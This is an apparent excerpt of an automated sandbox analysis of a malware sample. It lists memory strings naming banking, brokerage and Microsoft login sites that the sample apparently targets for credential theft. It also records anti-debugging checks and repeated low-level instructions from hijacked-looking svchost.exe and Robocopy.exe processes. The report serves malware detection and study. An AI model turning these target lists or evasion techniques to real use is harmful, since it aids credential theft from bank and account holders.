            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0081C8D0 FindFirstFileW,FindNextFileW,FindClose,4_2_0081C8D0
            Source: 40mEe3Hg.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 40mEe3Hg.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 40mEe3Hg.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 40mEe3Hg.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: HoiWfznxKU.exe, 00000006.00000002.3985470272.0000000000A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: 40mEe3Hg.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 40mEe3Hg.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 40mEe3Hg.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 40mEe3Hg.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002D35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 40mEe3Hg.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 40mEe3Hg.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 40mEe3Hg.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: firefox.exe, 00000007.00000002.2562350080.000002D1068FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==E.P
            Source: 40mEe3Hg.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 40mEe3Hg.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 40mEe3Hg.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 40mEe3Hg.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 40mEe3Hg.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 40mEe3Hg.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 40mEe3Hg.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 40mEe3Hg.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD1C0 rdtsc 2_2_030AD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417E93 LdrLoadDll,2_2_00417E93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B930B mov eax, dword ptr fs:[00000030h]2_2_030B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B930B mov eax, dword ptr fs:[00000030h]2_2_030B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B930B mov eax, dword ptr fs:[00000030h]2_2_030B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D mov eax, dword ptr fs:[00000030h]2_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D mov eax, dword ptr fs:[00000030h]2_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305F32A mov eax, dword ptr fs:[00000030h]2_2_0305F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03027330 mov eax, dword ptr fs:[00000030h]2_2_03027330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C mov eax, dword ptr fs:[00000030h]2_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C mov eax, dword ptr fs:[00000030h]2_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105341 mov eax, dword ptr fs:[00000030h]2_2_03105341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029353 mov eax, dword ptr fs:[00000030h]2_2_03029353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029353 mov eax, dword ptr fs:[00000030h]2_2_03029353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF367 mov eax, dword ptr fs:[00000030h]2_2_030EF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037370 mov eax, dword ptr fs:[00000030h]2_2_03037370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037370 mov eax, dword ptr fs:[00000030h]2_2_03037370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037370 mov eax, dword ptr fs:[00000030h]2_2_03037370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310539D mov eax, dword ptr fs:[00000030h]2_2_0310539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A mov eax, dword ptr fs:[00000030h]2_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A mov eax, dword ptr fs:[00000030h]2_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030533A5 mov eax, dword ptr fs:[00000030h]2_2_030533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030633A0 mov eax, dword ptr fs:[00000030h]2_2_030633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030633A0 mov eax, dword ptr fs:[00000030h]2_2_030633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EB3D0 mov ecx, dword ptr fs:[00000030h]2_2_030EB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF3E6 mov eax, dword ptr fs:[00000030h]2_2_030EF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031053FC mov eax, dword ptr fs:[00000030h]2_2_031053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03067208 mov eax, dword ptr fs:[00000030h]2_2_03067208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03067208 mov eax, dword ptr fs:[00000030h]2_2_03067208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105227 mov eax, dword ptr fs:[00000030h]2_2_03105227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029240 mov eax, dword ptr fs:[00000030h]2_2_03029240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029240 mov eax, dword ptr fs:[00000030h]2_2_03029240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306724D mov eax, dword ptr fs:[00000030h]2_2_0306724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EB256 mov eax, dword ptr fs:[00000030h]2_2_030EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EB256 mov eax, dword ptr fs:[00000030h]2_2_030EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BD250 mov ecx, dword ptr fs:[00000030h]2_2_030BD250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FD26B mov eax, dword ptr fs:[00000030h]2_2_030FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FD26B mov eax, dword ptr fs:[00000030h]2_2_030FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03059274 mov eax, dword ptr fs:[00000030h]2_2_03059274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03071270 mov eax, dword ptr fs:[00000030h]2_2_03071270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03071270 mov eax, dword ptr fs:[00000030h]2_2_03071270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105283 mov eax, dword ptr fs:[00000030h]2_2_03105283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306329E mov eax, dword ptr fs:[00000030h]2_2_0306329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306329E mov eax, dword ptr fs:[00000030h]2_2_0306329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A0 mov eax, dword ptr fs:[00000030h]2_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A0 mov eax, dword ptr fs:[00000030h]2_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A0 mov eax, dword ptr fs:[00000030h]2_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A0 mov eax, dword ptr fs:[00000030h]2_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F92A6 mov eax, dword ptr fs:[00000030h]2_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F92A6 mov eax, dword ptr fs:[00000030h]2_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F92A6 mov eax, dword ptr fs:[00000030h]2_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F92A6 mov eax, dword ptr fs:[00000030h]2_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C72A0 mov eax, dword ptr fs:[00000030h]2_2_030C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C72A0 mov eax, dword ptr fs:[00000030h]2_2_030C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B92BC mov eax, dword ptr fs:[00000030h]2_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B92BC mov eax, dword ptr fs:[00000030h]2_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B92BC mov ecx, dword ptr fs:[00000030h]2_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B92BC mov ecx, dword ptr fs:[00000030h]2_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C0 mov eax, dword ptr fs:[00000030h]2_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C0 mov eax, dword ptr fs:[00000030h]2_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C0 mov eax, dword ptr fs:[00000030h]2_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C0 mov eax, dword ptr fs:[00000030h]2_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C0 mov eax, dword ptr fs:[00000030h]2_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C0 mov eax, dword ptr fs:[00000030h]2_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C0 mov eax, dword ptr fs:[00000030h]2_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030392C5 mov eax, dword ptr fs:[00000030h]2_2_030392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030392C5 mov eax, dword ptr fs:[00000030h]2_2_030392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B2D3 mov eax, dword ptr fs:[00000030h]2_2_0302B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B2D3 mov eax, dword ptr fs:[00000030h]2_2_0302B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B2D3 mov eax, dword ptr fs:[00000030h]2_2_0302B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305F2D0 mov eax, dword ptr fs:[00000030h]2_2_0305F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305F2D0 mov eax, dword ptr fs:[00000030h]2_2_0305F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED mov eax, dword ptr fs:[00000030h]2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031052E2 mov eax, dword ptr fs:[00000030h]2_2_031052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF2F8 mov eax, dword ptr fs:[00000030h]2_2_030EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030292FF mov eax, dword ptr fs:[00000030h]2_2_030292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
